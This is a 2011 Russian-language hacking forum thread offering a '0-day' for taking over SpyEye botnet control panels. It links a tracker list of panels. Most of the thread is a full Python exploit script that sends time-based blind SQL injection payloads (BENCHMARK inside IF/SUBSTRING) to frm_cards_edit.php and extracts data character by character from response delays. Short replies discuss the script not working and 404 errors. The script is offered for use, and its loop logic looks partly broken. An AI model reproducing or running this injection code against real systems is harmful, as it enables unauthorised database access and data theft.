0-day для угона ботнетов SpyEye, кто разобрался?

Discussion in 'Уязвимости' started by FlatL1ne, 19 Sep 2011.

  1. FlatL1ne

    FlatL1ne Elder - Старейшина

    Joined:
    5 Oct 2007
    Messages:
    96
    Likes Received:
    27
    Reputations:
    10
    Список ЦУ https://spyeyetracker.abuse.ch/monitor.php


    Code:
      #!/usr/bin/python
         
        from httplib import HTTPConnection
        from time import time
        from sys import exit, argv, stdout
        import urllib
        print """
        1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
        0             __      __   __                   __                           1
        1           /'__`\ /'__`\/\ \__              /'__`\                        0
        0     _ __ /\ \/\ \/\ \/\ \ \ ,_\ __  __  __/\ \/\ \ _ __    ___ ___       1
        1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\    0
        0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \   1
        1     \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\  0
        0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
        1                                                                            0
        0                                                                            1
        1                                       >> SpyEye r0073r xpl01t              0
        0                                       >> author : Sanjar Satsura           1
        1                                       >> sanjar[at]xakep[dot]ru            0
        0                                       >> Public v.0.1                      1
        1                                       >> )c(  2011                         0
        0                                                                            1
        1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
         
         Example:                                                        
         Spyeye_r0073r <host>/dir/"version()"                        
         
        """
         
        if len(argv)<=3: exit()
        else:   print "[+]Started pwn..."
         
        host = argv[1]
        path = argv[2]
        sql = argv[3]
        port = 80
         
         
        hash = ""
        full = []
         
        for k in range(48,122):
            full.append(k)
        full.append(0)
        # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
        # This is the charset to try
         
        delay = 0.5
        a=1
        while a <= 32:
            for i in full:
                j = 0
                if i == 0:  exit('\n[+]Finished\n')
                #
                start = time()
                # start time for the delay
                conn = HTTPConnection(host,port)
                #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
                values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
                data = urllib.urlencode(values)
                print data
                conn.request("GET", path + "frm_cards_edit.php?" + data )
                response = conn.getresponse()
                read = response.read()    
                print read
                 
                if response.status == 404: exit('[+]404')
                #404
                now = time()
                if now - start > delay:
                #has come true then the character is valid
                    stdout.write(chr(i))
                    stdout.flush()
                    hash += chr(i)
                    a += 1
                    break;
                else: j += 1
                print "i vale %s, y J vale %s" %(i,j)
                       
                       
                       
        # w4tch u. h4ck u. fuck u. 1337day
        # www.r00tw0rm.com
    
     
  2. Bukvo_Ezka

    Bukvo_Ezka Banned

    Joined:
    8 Sep 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    дак а что неполучается то именно?
     
  3. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    102
    Likes Received:
    20
    Reputations:
    1
    да ладно, какая там иньекция? )
     
  4. Bukvo_Ezka

    Bukvo_Ezka Banned

    Joined:
    8 Sep 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    прочухал прочухал )))
     
  5. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    178
    Likes Received:
    18
    Reputations:
    9
    frm_cards_edit.php

    что-то на всех админках 404 ошибку выдает...
    в какой дире лежит этот файлик?
     
Loading...